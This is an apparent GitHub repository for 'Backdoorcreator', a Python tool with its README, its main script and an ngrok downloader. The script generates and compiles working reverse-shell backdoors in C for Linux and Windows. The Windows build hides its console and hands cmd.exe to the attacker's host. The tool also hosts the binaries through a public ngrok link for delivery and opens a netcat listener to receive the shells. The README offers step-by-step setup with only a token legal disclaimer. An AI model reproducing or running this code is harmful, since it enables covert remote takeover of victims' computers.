├── README.md
├── backdoorcreate.py
├── requirements.txt
├── screenshot.png
└── server.py
/README.md:
--------------------------------------------------------------------------------
1 | # Backdoorcreator
2 | This tool will create backdoor and listen for incoming connections
3 |
4 | # Steps To Run This Tool On Linux:
5 | - git clone https://github.com/krishpranav/Backdoorcreator
6 | - cd Backdoorcreator
7 | - sudo chmod +x *
8 | - python3 -m pip install -r requirements.txt
9 | - python3 server.py
10 | - python3 backdoorcreate.py
11 |
12 | # Steps To Run This Tool On Mac:
13 | - git clone https://github.com/krishpranav/Backdoorcreator
14 | - cd Backdoorcreator
15 | - sudo chmod +x *
16 | - python3 -m pip install -r requirements.txt
17 | - python3 server.py
18 | - python3 backdoorcreate.py
19 |
20 | # Steps To Run This Tool On Android(Termux):
21 | - git clone https://github.com/krishpranav/Backdoorcreator
22 | - cd Backdoorcreator
23 | - chmod +x *
24 | - apt install python3
25 | - python3 -m pip install -r requirements.txt
26 | - python3 server.py
27 | - python3 backdoorcreate.py
28 |
29 | # Reference
30 |
31 |
32 | # Use This Tool Is For Legal Purpose Only
33 |
34 | - TOOL IS CREATED BY KRISNA PRANAV
35 |
36 |
--------------------------------------------------------------------------------
/backdoorcreate.py:
--------------------------------------------------------------------------------
1 | from subprocess import check_output
2 | from time import sleep
3 | import os
4 | import sys
5 | import http.server
6 | import socket
7 | import re
8 |
9 |
10 | def choice():
11 | print("""
12 |
13 | [\033[1;39m1\033[1;36m] linux
14 | [\033[1;39m2\033[1;36m] windows
15 | [\033[1;39m3\033[1;36m] Listening Connection
16 | [\033[1;39m4\033[1;36m] Exit
17 | """)
18 |
19 | options = input("\033[1;39mSelect Your Target System : \033[1;39m")
20 |
21 | if (options == '1'):
22 |
23 | host = input("\n\033[1;36mIP: \033[1;39m")
24 | port = input("\n\033[1;36mPORT: \033[1;39m")
25 | linux_shell(host, port)
26 | os.system("gcc .linux.c -o LinuxBackDoor -pthread && rm -rf .linux.c")
27 | os.system("chmod +x LinuxBackDoor")
28 | print("\n\033[1;36mFile Saved > \033[1;39mLinuxBackDoor")
29 |
30 | os.system("python3 -m http.server 80 > .server 2> /dev/null &")
31 | os.system("chmod +x ngrok")
32 | name1 = "/LinuxBackDoor"
33 | portN = 80
34 | os.system("./ngrok http {} > /dev/null &".format(portN))
35 | sleep(8)
36 | os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
37 | urlFile = open('link2.url', 'r')
38 | url = urlFile.read()
39 | urlFile.close()
40 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
41 | print("\n\033[1;36mLINK : \033[1;39m", url + name1)
42 |
43 | print(" ")
44 |
45 | if (options == '2'):
46 |
47 | host = input("\n\033[1;36mIP: \033[1;39m")
48 | port = input("\n\033[1;36mPORT: \033[1;39m")
49 | windows_reverse(host, port)
50 | os.system(
51 | "/usr/bin/i686-w64-mingw32-gcc .windows.c -o windows.exe -lws2_32 && rm -rf .windows.c")
52 | print("\n\033[1;36mFile Saved > \033[1;39mwindowsBackdoor")
53 | os.system("python3 -m http.server 80 > .server 2> /dev/null &")
54 | os.system("chmod +x ngrok")
55 | name2 = "/Windows.exe"
56 | portN = 80
57 | os.system("./ngrok http {} > /dev/null &".format(portN))
58 | sleep(8)
59 | os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
60 | urlFile = open('link2.url', 'r')
61 | url = urlFile.read()
62 | urlFile.close()
63 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
64 | print("\n\033[1;36mLINK : \033[1;39m", url + name2)
65 |
66 | print(" ")
67 |
68 | if (options == '3'):
69 | port = input("\n\033[1;36mPORT: \033[1;39m")
70 | print("\n\033[1;36mWaiting For Connection ...\n")
71 | os.system("nc -l -p %s" % port)
72 | print("\033[1;36m")
73 |
74 | if (options == '4'):
75 | sys.exit()
76 | os.system("fuser -k -n tcp 80")
77 |
78 |
79 | else:
80 | choice()
81 |
82 |
83 | def linux_shell(host, port):
84 | with open(".linux.c", "w") as file:
85 | file.write('''
86 | #include
87 | #include
88 | #include
89 | #include
90 |
91 | int main (int argc, char **argv)
92 | {
93 | int scktd;
94 | struct sockaddr_in client;
95 |
96 | client.sin_family = AF_INET;
97 | client.sin_addr.s_addr = inet_addr("%s");
98 | client.sin_port = htons(%s);
99 | scktd = socket(AF_INET,SOCK_STREAM,0);
100 | connect(scktd,(struct sockaddr *)&client,sizeof(client));
101 | dup2(scktd,0); // STDIN
102 | dup2(scktd,1); // STDOUT
103 | dup2(scktd,2); // STDERR
104 | execl("/bin/sh","sh","-i",NULL,NULL);
105 | return 0;
106 | }
107 | ''' % (host, port))
108 |
109 |
110 | def windows_reverse(host, port):
111 | with open(".windows.c", "w") as file:
112 | file.write('''
113 | #include
114 | #include
115 | #define _WINSOCK_DEPRECATED_NO_WARNINGS
116 | #pragma comment(lib,"ws2_32")
117 | WSADATA wsaData;
118 | SOCKET Winsock;
119 | SOCKET Sock;
120 | struct sockaddr_in hax;
121 | char ip_addr[16];
122 | STARTUPINFO ini_processo;
123 | PROCESS_INFORMATION processo_info;
124 | //int main(int argc, char *argv[])
125 | int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdParam, int iCmdShow)
126 | {
127 | FreeConsole();
128 | WSAStartup(MAKEWORD(2,2), &wsaData);
129 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
130 |
131 | struct hostent *host;
132 | host = gethostbyname("''' + host + '''");
133 | strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
134 | hax.sin_family = AF_INET;
135 | hax.sin_port = htons(atoi("''' + port + '''"));
136 | hax.sin_addr.s_addr = inet_addr(ip_addr);
137 | WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL);
138 | memset(&ini_processo,0,sizeof(ini_processo));
139 | ini_processo.cb=sizeof(ini_processo);
140 | ini_processo.dwFlags=STARTF_USESTDHANDLES;
141 | ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
142 | CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&ini_processo,&processo_info);
143 | }
144 | ''')
145 |
146 |
147 | if __name__ == '__main__':
148 | choice()
149 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | subprocess
2 | os
3 | sys
4 | http.server
5 | re
6 | socket
7 | time
8 |
--------------------------------------------------------------------------------
/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/krishpranav/Backdoorcreator/417b15063380338cafa9fd2c23485ad107e7075b/screenshot.png
--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
1 | from subprocess import check_output
2 | import os
3 | from platform import system as systemos, architecture
4 | from wget import download
5 |
6 |
7 | def Ngrok():
8 | if True:
9 | if 'Android' in str(check_output(('uname', '-a'))) or 'arm' in str(check_output(('uname', '-a'))):
10 | filename = 'ngrok-stable-linux-arm.zip'
11 | else:
12 | ostype = systemos().lower()
13 | if architecture()[0] == '64bit':
14 | filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
15 | else:
16 | filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
17 | url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
18 | download(url)
19 | os.system('unzip ' + filename)
20 | os.system('rm -Rf ' + filename)
21 | os.system('clear')
22 |
23 |
24 | Ngrok()
25 |
--------------------------------------------------------------------------------